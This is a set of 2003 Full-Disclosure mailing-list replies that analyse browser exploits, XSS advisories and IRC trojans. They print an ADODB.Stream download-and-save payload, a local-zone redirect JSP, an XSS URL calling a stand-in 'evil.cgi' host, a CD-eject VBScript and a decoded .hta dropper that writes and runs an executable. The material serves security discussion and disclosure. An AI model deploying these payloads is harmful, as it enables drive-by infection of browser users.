completely incorrect treatment and work of the Geeklog > >development team , that they don't developed fixes for THEIR product > > As a member of the Geeklog Development Team, I'd like to point out that > the poster of the above lines did not bother to contact us, both with his > original findings, nor with these patches. Talk about incorrect treatment. > > Furthermore, of the original findings (posted here and on BugTraq a week > ago), only the Shoutbox issue has been confirmed (and a patch is > available on the Geeklog website). > > None of the supposed SQL injection issues that Lorenzo Hernandez Garcia- > Hierro claims to have found could be confirmed by us or members of the > Geeklog community. We can only assume that he only noticed that when > attempting to inject SQL into URLs, Geeklog would produce SQL errors and > from that he seems to have deduced that Geeklog was vulnerable for SQL > injections. When asked to explain his findings, he couldn't (or wouldn't) > come up with a working example either. > > Now, there's no doubt that Geeklog could do a better job in filtering > these attempts. Work on that is currently under way - which we would have > told Lorenzo Hernandez Garcia-Hierro if he had bothered to contact us. > > Potential problems that we have found so far: > > - the SQL error message displayed by Geeklog could, in theory, leak > sensitive information > - sites where the PHP magic_quotes setting is OFF are slightly more prone > to the (alleged) injections then when it's ON > - sites running on MySQL 4.1 (which is currently in alpha state and not > ready for production use) are at a higher risk since MySQL 4.1 allows > concatenation of SQL requests (which previous versions didn't) > > We have informed our users about these issues on the Geeklog homepage and > will continue to do so. We value security very highly, but we prefer to > handle it in a non-sensationalist way. We would have prefered to come up > with a solution to the problems and then post a detailed analysis of the > problems here (and on BugTraq). With his failure to contact the > developers, Lorenzo Hernandez Garcia-Hierro has yet again caused more > confusion than actually helping the situation. > > Overall, this is a textbook example of how NOT to handle security issues. > By not contacting the developers, posting a report full of inaccuracies, > and, in the end, mostly non-working examples, Lorenzo Her
Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
Like people have noted, this old news But to comment on what you said, it protects you against the exploit not the vulnerability, you might just as well drop an exe in the users start folder, yes it wouldn't be instant but preciously few people would notice it --jelmer - Original Message - From: Peter King To: [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 12:31 PM Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) i confirm that an unprivileged user is safe from this exploit. and i agree with you : too many people are running their Windows with Full Privileges :/ Regards. Peter - System AdministratorIrwan Hadi <[EMAIL PROTECTED]> wrote: On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote:> > - Original Message - > From: "Stephen" <[EMAIL PROTECTED]>> To: <[EMAIL PROTECTED]>> Sent: Thursday, October 09, 2003 5:19 AM> Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!)> > > >> > It becomes really dangerous to use IE ...> >> > http://www.k-otik.com/WMPLAYER-TEST/> >> > God bless Mozilla> >> > http://www.mozilla.org/> >> > > Your test didn't work on my IESP1 under XP with all patches excepting> 811394. Absolutely no effect on WMP. My original WMP remains and works.It depends whether you were logging as a privileged user or not.If not, then your browser can't delete the wmplayer.exe file, becausethe only user that can change/delete the wmplayer.exe file is privilegeduser.C:\PROGRA~1\Windows Media Player>cacls wmplayer.exeC:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:RBUILTIN\Power Users:CBUILTIN\Administrators:FNT AUTHORITY\SYSTEM:FC:\PROGRA~1\Windows Media Player>The problem is just too many people are running their Windows withFull Privileges. Do you Yahoo!?The New Yahoo! Shopping - with improved product search
Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
just looked at it, the authors messed up , so no it shouldn't work, it doesn't work here they didn't get that error.jsp is a java server page (something roughly equivalent to asp and php) that sets the response code to something that triggers the res file to be loaded --jelmer - Original Message - From: "Syed Imran Ali" <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Friday, October 10, 2003 12:02 PM Subject: RE: [Full-Disclosure] Internet Explorer (BAN IT !!!) > Yup that's true the exploit actually didn't worked even if I was logged > in as Administrator or a normal user in Windows XPSp1 with all patches > installed except 811394. > > Regards, > Syed Imran Ali > > Senior Network Engineer > > (T) +92-300-9256202 > > :~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~: > The information contained in this e-mail is confidential and may be > privileged. It is intended for the addressee only. If you have received > this e-mail in error please notify us immediately, then delete this > e-mail. You should not copy it for any purpose, or disclose its contents > to any other person. We cannot accept any responsibility for viruses, so > please scan all attachments. The statements and opinions expressed in > this message are those of the author and do not necessarily reflect > those of the company. The company does not take any responsibility for > the views of the author > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of gregh > Sent: Friday, October 10, 2003 3:07 AM > To: Irwan Hadi > Cc: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) > > - Original Message - > From: "Irwan Hadi" <[EMAIL PROTECTED]> > To: "gregh" <[EMAIL PROTECTED]> > Cc: "Stephen" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> > Sent: Thursday, October 09, 2003 3:55 PM > Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) > > > > On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote: > > > > > > > > - Original Message - > > > From: "Stephen" <[EMAIL PROTECTED]> > > > To: <[EMAIL PROTECTED]> > > > Sent: Thursday, October 09, 2003 5:19 AM > > > Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!) > > > > > > > > > > > > > > It becomes really dangerous to use IE ... > > > > > > > > http://www.k-otik.com/WMPLAYER-TEST/ > > > > > > > > God bless Mozilla > > > > > > > > http://www.mozilla.org/ > > > > > > > > > > > > > Your test didn't work on my IESP1 under XP with all patches > excepting > > > 811394. Absolutely no effect on WMP. My original WMP remains and > works. > > > > It depends whether you were logging as a privileged user or not. > > If not, then your browser can't delete the wmplayer.exe file, because > > the only user that can change/delete the wmplayer.exe file is > privileged > > user. > > C:\PROGRA~1\Windows Media Player>cacls wmplayer.exe > > C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R > > BUILTIN\Power Users:C > > BUILTIN\Administrators:F > > NT AUTHORITY\SYSTEM:F > > > > > > C:\PROGRA~1\Windows Media Player> > > > > The problem is just too many people are running their Windows with > > Full Privileges. > > > > > Didnt matter what I logged in as. I normally am ADMIN, naturally but a > priveleged user, a very limited user - no difference. The exploit didnt > work. > > Greg. > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
This is the code you send
THIS IS hUNT3R aka:Bipin Gautam, exploit revised by
Cyberdude
document.write("<b>hUNTER &
Cyberdude</b>alert("it works 1");
alert("This works 2");
this gives an Unterminated string constant error followed by 2 alerts, which
is exactly what it should do
1. document.write("<b>hUNTER & Cyberdude</b>
this gives the unterminated string constant, your simply not closing your
string, hUNTER & Cyberdude never gets written out
2. alert("it works 1"); alert("This works 2");
This is perfectly valid and thus executes
I really dont see what your trying to do or what the threat would be when
you got whatever your trying to do to work
--jelmer
- Original Message -
From: "bipin gautam" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 7:16 PM
Subject: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML
interpreter or the JavaScript compiler?
> --- [Effected] ---
> All versions of "OPERA, MOZILLA and INTERNET EXPLORER"
> available up to this, relese DATE!
> --- [Proof of concept] ---
> We have made a small script. Check it out,
> http://www.cyberdude.com.np/javascript.htm
> --- [Bug Details] ---
>
>
>
> THIS IS hUNT3R aka: Bipin Gautam
>
alert("<script>location.href="<a href="http://www.ysgnet.com"">http://www.ysgnet.com"</a>;")
>
>
>
>
>
>
>
> THIS IS hUNT3R aka:Bipin Gautam, exploit revised by
> Cyberdude
>
> document.write("<b>hUNTER &
> Cyberdude</b>alert("it works 1");
> alert("This works 2");
>
>
>
>
> *
> --[Description]---
> The browser is letting you compile some-thing inside
> the alert function. Well, its should show it anyways
> without compiling the script tag as it is inside the
> quotation. But surprising, the output is different! We
> found JavaScript compiler choked when we use the
> tag inside a function like alert(); this also
> proves to be true for document.write(); function. This
> means that this script is going to choke bad and you
> wont get any output but just the ); that's all.
>
> This script is working. Its not that it is not
> working. It works in the starting script tag but when
> the html parses the script tag inside the
> document.write it goes mad coz nested scripting is not
> possible in HTML, the only nested tag in HTML must be
> the table tag, so in this script the HTML interpreter
> goes mad. but we can still insert the java script in
> it.
>
> What we did was, we inserted the closing tag of
> JavaScript first closing the script tag that
> was opened already. After that we added the new
> starting
Re: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )
they fixed it with MS03-021 alongside some other issues http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/1765.html - Original Message - From: "Lorenzo Hernandez Garcia-Hierro" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Friday, October 10, 2003 11:12 PM Subject: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit ) > Hi friends, > I'm not very happy with this , i have done an online test for eject cds in a > MS Internet Explorer > and i have tested it in all the computers of my house but i was surprised > when i checked that the > last version of MSIE allows the execution of the script in the following > sec. zones: > . LOCAL/INTRANET > . REMOTE/INTERNET > I tested it in default values and the exploit is executed , i edited the > values and again it was > executed. > Am i discovering a new vulnerability in MS Internet Explorer ? > I'm not sure because there are lots of known holes in MSIE. > Suggestions and help is completely welcome. > The best regards, > PS: This is the code of the exploit: > - > > rem -- > rem No Secure Root Group Security Research > remCoder: Trulux / Lorenzo Hdez G-H > rem -- > remhttp://www.nsrg-security.com > rem -- > rem -> CREATE WINDOWS MEDIA PLAYER OBJECT > rem - > Set LARRYINTHEWILD = CreateObject("WMPlayer.OCX.7" ) > rem - > rem -> SETTING SOME VARIABLES FOR EJECT CD UNITS > rem - > Set RIAAsaysBLAH = LARRYINTHEWILD.cdromCollection > rem - > rem -> EJECTING ROUTINE > rem - > if RIAAsaysBLAH.Count >= 1 then > For i = 0 to RIAAsaysBLAH.Count - 1 > RIAAsaysBLAH.Item(i).Eject > Next ' cdrom > End If > rem -> END > > -- > > NOTE: i don't know if this is a known security hole , if this was > discovered before , i'm sorry ( and a little sad :-( ). > you can test it online: > http://test-zone.nsrg-security.com/browser/msie/cdrom > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
Donny, These are in the example applications, which any sane admin should disable right away, much like caucho-status These are basic procedures in setting up a server. --jelmer - Original Message - From: "morning_wood" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Sunday, October 19, 2003 12:37 PM Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting > - > - EXPL-A-2003-026 exploitlabs.com Advisory 026 - > - > -= Caucho Resin =- > > > Donnie Werner > Oct 18, 2003 > > > > Vunerability(s): > > 1. XSS > > > note: this is not > > http://www.securiteam.com/securitynews/5KP0O1F7FM.html > http://www.securitytracker.com/alerts/2002/Jun/1004552.html > > > Product: > > Caucho Resin Httpd 2.x > > Reviews: > > http://www.caucho.com/sales/customers.xtp > > > Description of product: > --- > "Resin® is a cutting-edge XML Application Server. > It serves the fastest servlets and JSP." > > > VUNERABILITY / EXPLOIT > == > default port 8080 ( others used ) > > affected scripts: > env.jsp > form.jsp > session.jsp > tictactoe.jsp > > http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=http://attcker/evil.cgi";>4 > or > alert(document.domain);
Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
- Original Message - From: "Gregory Steuck" <[EMAIL PROTECTED]> To: "jelmer" <[EMAIL PROTECTED]> Cc: "morning_wood" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Monday, October 20, 2003 7:27 AM Subject: Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting > >>>>> "jelmer" == jelmer <[EMAIL PROTECTED]> writes: > > jelmer> Donny, These are in the example applications, which any sane > jelmer> admin should disable right away, much like caucho-status > jelmer> These are basic procedures in setting up a server. > > Yes, but is it not extremely lame of the vendor to ship samples with > XSS vulnerabilities? The point of examples is usually to be as clear as possible so it's easy to userstand, adding filtering would just make the examples harder to read, it's not production code after all, I think it's perfectlty ok if caucho refuses to "fix" this ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] RE: Internet Explorer and Opera local zone restriction bypass
osed by IE6 SP1 is imposed on all local protocols, such
as file:// and res://, and this new way to circumvent it equally applies to
all local protocols. This means that you don't have to know the location of
a specific file, but instead can open a ressource file available on all
systems, such as
>
> Content-Location: res:///browselc.dll/mb404.htm
>
> Of course, since you could not inject any code in the ressource file you
will now have to use another cross-domain scripting vulnerability in place
of the Macromedia Flash vulnerability you identified in the first issue. On
the positive side, it also means that you no longer have to guess the users
Windows Logon name.
>
>
> In summary, when Macromedia changes their Flash player to no longer store
Flash cookies in plaintext in a known location, this will no longer be an
issue. All of the currently unpatched cross-domain scripting vulnerabilities
are having patches produced, and since they have no easy POC exploits I
doubt we will see any malicious use of the local file redirection variation
you found.
>
>
>
> Regards
> Thor Larholm
> PivX Solutions, LLC - Senior Security Researcher
> http://pivx.com/larholm/ - Get our research, join our mailinglist
>
here's what I send to bugtraq
--------
--
what this does is have a swf file generate a "flash cookie" or .sol file
which gets stored to a pseudo known location
(you need to know the logged in username)
C:\Documents and Settings\Jelmer\Application Data\Macromedia\Flash
Player\mlsecurity.com\mlsecurity.sol
in this cookie we find
var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET",
"<a href="http://mlsecurity.com/random/ie.txt",0">http://mlsecurity.com/random/ie.txt",0</a>); x.Send();var s = new
ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\mlsecurity.txt",2);
which is the unpatched ADODB.Stream issue so what he's trying to do is get
this to run from this sol file
by getting internet explorer to render it as an html file in an iframe
he tries to acomplish this by setting the response code to 302 (MOVED
TEMPORARILY) and making the location header in the reply point to a the
locally stored cookie
like this :
HTTP/1.1 302 Found
Date: Fri, 24 Oct 2003 23:32:13 GMT
Server: Apache/2.0.46 (Unix)
Accept-Ranges: bytes
Location: file:///C:/Documents and Settings/jelmer/Application
Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
the following jsp duplicates the behaviour
--snip--
<%
response.setStatus(HttpServletResponse.SC_MOVED_TEMPORARILY);
response.setHeader("Location","file:///C:/Documents and
Settings/jelmer/Application Data/Macromedia/Flash
Player/mlsecurity.com/mlsecurity.sol");
%>
--snip--
then he uses a dynamic iframe to load this page rather than a static one, eg
he uses
document.write('');
rather than
using the static version has no effect
now thats how it works, now about *if* it works. , well when I initially
tried it, it did absolutely nothing for me
(fully patched IE6) yes it showed the location in the IFRAME as being local
in de frame properties, but it didn't
render the contents.
then I cleared the cache closed IE and all of the sudden it was kind of
working, in that it renders the local
file on pressing the refresh button.
When testing from the local filesystem, calling
window.frames[0].location.reload() also did
the trick, thus "automating" the attack,
You cant use this from the internet though because of cross domain policies,
although you could
most likely bypass this by using one of liu die yu's unpatched
vulnerabilities
All in all its still a bit rough and probably needs some work at least from
where I am sitting
for those curious as to what is in the swf , here's the actionscript code
function saveobject(cookiename)
{
var Daten_array = new Array("Sven", "kelor", "Tschdaeff", "Madokan",
"Ming", "Coolflash");
var Datum = new Date();
var Satz_str = _root.teststr_txt.text;
_root.createEmptyMovieClip("Test_mc", 0);
meinCook_so = SharedObject.getLocal(cookiename, "/");
meinCook_so.data.my_String = Satz_str;
meinCook_so.data.my_Array = Daten_array;
meinCook_so.data.my_Date = Datum;
meinCook_so.data.my_MovieClip = Test_mc;
RESULTS = meinCook_so.flush();
if (RESULTS == true)
{
_root.message_txt.text = "Eingabe Erfolgreich!";
}
}
function readobject(cookiename)
{
leseCook_so = SharedObject.getLocal(cookiename, "/");
delete("meinCook_so");
_root.read_txt.htmlText = "my
Re: [Full-Disclosure] PIVX - GLAMOR PUSSES DE LUXE
> Uno\ there is no scurity confirmation on the new mailing list created > by pivx. We have subscribed everyone on this list to their new security > update and self-promotion mailing list. And you don't even know it. > > Dos\ there is no way to unsubscribe from the new mailing list created > by pivx. How the blazes can one not receive this self-promotional drivel > at this time > > Tres\ html or plaintext selection for the the new mailing list created > by pivx has no effect. The self-promotional material arrives as insidious > html An electronic message is "spam" IF: (1) the recipient's personal identity and context are irrelevant because the message is equally applicable to many other potential recipients; AND (2) the recipient has not verifiably granted deliberate, explicit, and still-revocable permission for it to be sent; AND (3) the transmission and reception of the message appears to the recipient to give a disproportionate benefit to the sender. seems to match all 3 criteria, report them ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] when will IE exploits COME TO AN END...
and what would the security implications of this be in your *cough* expert opinion http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q208/4/27.asp&NoWebContent=1 - Original Message - From: "Bipin Gautam" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, October 28, 2003 3:17 PM Subject: [Full-Disclosure] when will IE exploits COME TO AN END... > another harmless! IE BUG... I GUESS > > Internet explorer can't click and properly open long URL's! in the browser... > > http://www.geocities.com/visitbipin/index9.htm > > see... IT'S A URL but ... you can't click at the link!!! > > I HAVE TRIED IT IN OTHER BROWSER INCLUDING OPERA AND THE LINK OPENS WITHOUT ANY PROBLEM! > > WHEN WILL IE BUG END UP... anyway!!! > > _ > Secure mail ---> http://www.blackcode.com > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Internet Explorer and Opera local zone restriction bypass
I tried that and as I expected that doesn't work , it just prompts for download.if you redirect to that file I think your confused with the object-tag-in-localzone type of vulnerabilities we had a while back, you could execute programs without parameters with that. but thats nothing like this, or should I perhaps write *NOTHING LIKE THIS!!!* ? as you seem to prefer caps, This vulnerability only removes the restrictions that servicepack 1 brought, in disallowing access to local urls --jelmer - Original Message - From: "Bipin Gautam" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Wednesday, October 29, 2003 3:29 PM Subject: [Full-Disclosure] Re: Internet Explorer and Opera local zone restriction bypass > try this ... > > its dam strange to see WINXP LOGOFF WITHOUT ASKING MY PERMISSION > > file://c:\windows\system32\logoff.exe > > > > _ > Secure mail ---> http://www.blackcode.com > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft plans tighter security measures in Windows XP SP2
pivx probably allready was http://slashdot.org/article.pl?sid=03/10/12/2221205&mode=thread&tid=109&tid=126&tid=128&tid=172&tid=187 Maybe they weren't handed a sack of money, but as the article states "This was done in both a spirit of cooperation" so this suggests microsoft involvement and microsoft "owing you one" is not a bad thing for any company Also mentioning pivx in one breath with georgi guninski and @stake is pushing it a bit Pivx plays the media really really well by giving their spokespersons important sounding names as "Senior Security Researcher" (just as a sidenote I really suggest adding "engineer" in there something, makes it sound even more creditable.) now Thor is a nice guy and a true javascript wiz but you can hardly compare pivx with someone like georgi guninski who pioneered browser security. or the skilled employees of @stake who do "real" security work -- pivx - protecting your enterprise from malicious halflife exploits and XSS issues in error pages ;) - Original Message - From: "Georgi Guninski" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Saturday, November 01, 2003 5:08 PM Subject: Re: [Full-Disclosure] Microsoft plans tighter security measures in Windows XP SP2 > On Fri, 31 Oct 2003 18:27:30 -0500 > [EMAIL PROTECTED] wrote: > > > > If I were a conspiracy theorist, I'd compare the probable cost of buying off > > Guninsky, the @stake crew, and the pivx crew, and compare that to the cost of > > actually fixing IE. Then remember that although the open-source world is > > about pride and craftsmanship, Microsoft is all about the benjamins > > > > The probable cost of buying Guninsky does not exist. > m$ are lusers, and I am not a wh0re. > > I agree with your other rants, though. > > georgi > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] irc.trojan.fgt - new variant.
I guess It's a matter of time before someone hacks in a http server and makes it send out links like http://victim ip/britney.jpg Luckily microsoft patches stuff within 2 days, balmer said so so it must be true ;) - Original Message - From: Tom Russell To: [EMAIL PROTECTED] Sent: Wednesday, November 05, 2003 9:46 PM Subject: [Full-Disclosure] irc.trojan.fgt - new variant. Once again, another variant of irc.trojan.fgt is about. This one masquerades as a web page - jokes.html, and makes the unfortunate recipient say the following: http:// home.amis .net/krsve9/Pari/jokes.html lol :D (spaces added to URL to prevent accidental infection). The virus files are at the following location: http://kalleth.2tone-dev.com/fd/jokes-html.zip - DO NOT RUN THE EXECUTABLE AS IT IS THE VIRUS. DO NOT OPEN THE HTML PAGE IN INTERNET EXPLORER AS IT IS A VIRUS. End of message.
Re: [Full-Disclosure] irc.trojan.fgt - new variant.
Yes but like you said it uses an angelfire page, If you take it down the virus is stopped If it gets too succesfull bandwidth limits are exceeded. So it will never widely spread that way If someone where to include a webserver in the worm there's no single point of failure - Original Message - From: "ge" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Friday, November 07, 2003 10:04 PM Subject: RE: [Full-Disclosure] irc.trojan.fgt - new variant. > > > I guess It's a matter of time before someone hacks in a http server > and makes it send out links like > > http://victim ip/britney.jpg > > Luckily microsoft patches stuff within 2 days, balmer said so so it > must be true ;) > > Since the trojan horse really was "britney.jpg", I hope I am not > responding to a joke. :) > > They already did. Without a hack to it. > > It started on the 26th of last months. > > britney.jpg came out. > > To remind us all, that trojan hose used one of the latest IE > vulnerabilities to overwrite wmplayer.exe with the trojan horse itself. > After luring the user to a simple .jpeg, that was actually HTML. So that > IE thought it got a 404 - file not found HTML response. > > Two days passed, and while we saw mimic, which used the same basic way > to fool a user into clicking on a URL for a picture of a model > celebrity, did not install any files on the PC, it just spammed itself, > and DDoS'd Microsoft by multiple port 80 connections. > > Every-day since, one to three new trojan horses came out. Always the > same drill: 1. An angelfire website (mainly), > http://url/pic-big-name.jpg > > (I would like to use this opportunity to commend angelfire again on > their amazingly fast and serious abuse-mail correspondence and good > work.) > > 2. The trojans always spams the same way, using mIRC's DDE server, with > "URL << wow !!" as the spam, or something very similar. > 3. The different files are not clones of one another, although some are > quite close to being clones, with minor changes to the file name, etc. > 4. the trojans always installs itself by replacing wmplayer.exe. In > later variations it copies itself to a few more locations. > > The basic parameters of these trojan horses are the same: > > They spam themselves, making sure others would click on that believable > URL, without any weird ".bat" or ".pif" etc. after the ".jpg" in the > file name, and then proceed to _seriously_ cripple, although not > destroy, the user's machine. > > The latest "releases" of these trojans are NOT clones. > > I believed that the biggest issue with britney.jpg would be copy-cats, > and that is what scared me. > I was wrong. > > This mal-ware spreads at incredible speed online, infecting and > destroying an incredible amount of computers (which is reasonable > considering the amount of us who would click on a URL for a super-model > picture). and then when the URL dies, a new trojan (or two... > even three) are released with the exact same modus operandi. > > The trojans have two objectives: one - multiply, and then destroy. > Somewhat of a kamikaze suicide bomber. Lately the boundaries between > "viruses" and other types of... "viruses" like trojan horses and worms > are thinning beyond recognition. In my opinion in any case. > > The sites are usually exceeding their allowed bandwidth use of the day > long before they are closed, which comes to show of the enormous > "clicking" people do. > > It is my firm belief that all these trojan horses have a common author, > and that he himself maintains his trojan's infectious state by just > releasing more "new" trojan horses to the wild. All just as destructive. > > This is the most concentrated assault I have ever seen by a mal-ware > WRITER, vs. just the mal-ware. > > Personally, I don't get it, but that's probably just me. > > I hope this information helps somebody out there, hopefully the FBI? > This attack may be over - although we are not sure yet, but I doubt we > heard the last of this guy. > > Gadi Evron (i.e. ge), > [EMAIL PROTECTED] > > > [EMAIL PROTECTED] - > PGP Key: 2048/2048 (Size) 0x2D3D6741 (ID). > Fingerprint: 0EB3 00BC 974B 3C2B 336D 6486 ECA5 2D0D 2D3D 6741. > > The Trojan Horses Research mailing list - http://ecompute.org/th-list > > My resume (Hebrew) - http://vapid.reprehensible.net/~ge/resume.rtf > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MS03-048: Thor and unpatched?
liu die yu now maintains an unpatched IE flaws page http://www.safecenter.net/UMBRELLAWEBV4/DirSvc/security/trie/index.html I am sure it will popup there -- jelmer - Original Message - From: "Paul Szabo" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Tuesday, November 11, 2003 11:29 PM Subject: [Full-Disclosure] MS03-048: Thor and unpatched? > Where are Thor and his web page > > http://www.PivX.com/larholm/unpatched/ > > when we need them? The cumulative IE patch MS03-048 is out, and we would > like to know what is fixed and what remains. > > (Is it known what http://www.pivx.com/qwikfix/ does? Will it remain free? > Is "Mocrosoft" a mis-spelling or some joke?) > > Cheers, > > Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/ > School of Mathematics and Statistics University of Sydney 2006 Australia > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] .hta virus analysys
.hta files is a proprietary concept, and only works in conjunction with Internet Explorer (specifically version 5 and above). basicly its much like a .html except it has no security restrictions there are 2 things being encoded in the script you sendan executable in a string called mand a piece of vbscript code in a string called cthey seem to be encoded to trick virusscanners into letting them passdecoding the vbscript code we get
Dim fs, dr, f
Set fs = CreateObject("Scripting.FileSystemObject")
f = "c:\a.exe"
Set dr = fs.CreateTextFile(f, True)
dr.Writeline m
dr.close
Set shell=CreateObject("WScript.Shell")
shell.run(f)
self.close
which basicly says, get the embedded .exe file store it in c:\a.exe then execute it the exe being dropped is identified by norton as being Trojan.Sinkin Trojan.Sinkin is a Trojan Horse that changes the Internet Explorer start and search pages, and sends AOL Instant Messenger information to a remote host. This Trojan may also display advertisements when the user is browsing the Web now you know - Original Message - From: Jim Duggan To: [EMAIL PROTECTED] Sent: Thursday, November 20, 2003 2:31 AMSubject: [Full-Disclosure] .hta virus analysysA friend contracted this .hta that seems to edit your profile with a link to itself, http://www.talkstocks.net/attached is the hta file it attempts to run. Its looks to be encoded, which is something i dont know much about but im sure most people on this list will have no problem reading it, just wondering what it does.Any help appreciatedThxJason
Re: [Full-Disclosure] .hta virus analysys
There's nothing wrong with .hta files, but that it has an associated mime type boggles the mind It's been the source of many an issue in the past. Microsoft would be better of disabling it entirely - Original Message - From: "Gary Flynn" <[EMAIL PROTECTED]> Cc: "[Full Disclosure]" <[EMAIL PROTECTED]> Sent: Thursday, November 20, 2003 9:50 PM Subject: Re: [Full-Disclosure] .hta virus analysys > Lets not all get in a tizzy about HTA. They're meant for platform > application development, not web development. They're treated just > like .exe files by IE (assuming a lack of defects - no snide > remarks necessary). > > They would seem to make a nice rapid development environment for > tools for end users because of their web interface and support for > the full WSH/WMI scripting model. Kind of like TCL/tk in that respect. > > Yes, that makes it easier for bad people to do bad things...but so > does the Internet, email, HTML, and perl. > > Just when windows starts shipping with half-way decent tools > (WSH/WMI/HTA) like unix (sh/perl/tcl/tk) everyone runs amok about > how insecure they are. Maybe that kind of power and programmability > shouldn't be available on unmaintained, consumer computers but that > argument could be extended to cover programmable computers in > general in the same hands. People click .scr, .pif, .exe, and > all manner of other attachments every day. > > The same power can be used for good too. Several organizations > wrote quick scripts to clean Blaster infections. Wrapping a browser > interface around them can make them easier for end users to use. > > Whether the file in question is an HTA, exe, sh, or an unknown > type until the OS translates the MAGIC number, operators have to > learn not to click them from untrusted sources. > > One wonders if everyone would yell about perl's ability to > exec system commands if we had a population of a couple hundred > million consumers running unix as root instead of windows > as administrator. > > If there is an argument against HTAs other than that they create > one more less complex way to create powerful executables (for good > or bad), I'll readily admit my error. (No fair bringing up > IE defects that allow them to run in error. I believe similar > defects have allowed .exe to run too. The source of the problem > in those cases is obvious and its not in the language/script > engine.) > > My politically incorrect $0.02 worth. > > -- > Gary Flynn > Security Engineer - Technical Services > James Madison University > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Comments on 5 IE vulnerabilities
> When I attended the NTBugtraq Retreat earlier this year, most of the > attendees were surprised to hear that I am using Internet Explorer on a > daily basis, particularly since I should know how vulnerable it can be > at any given time. I surf with JavaScript and ActiveX enabled, see flash > movies and play Java games, but despite this I am not vulnerable [0] to > a single command execution vulnerability or system compromise through > Internet Explorer. > > How, you might ask? Simple, I have locked down the My Computer security > zone on my installations [1]. > > Each and every command execution vulnerability in Internet Explorer over > the last few years have all depended on the functionality of local > security zones. Whenever you are crafting an exploit, you want to > navigate a window object to a local security zone, inject some scripting > or HTML into the window object and subsequently use the features of the > local security zone to execute your payload. Properly locking down the > My Computer zone prevents all of these from having any effect. each and every ? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0301.html 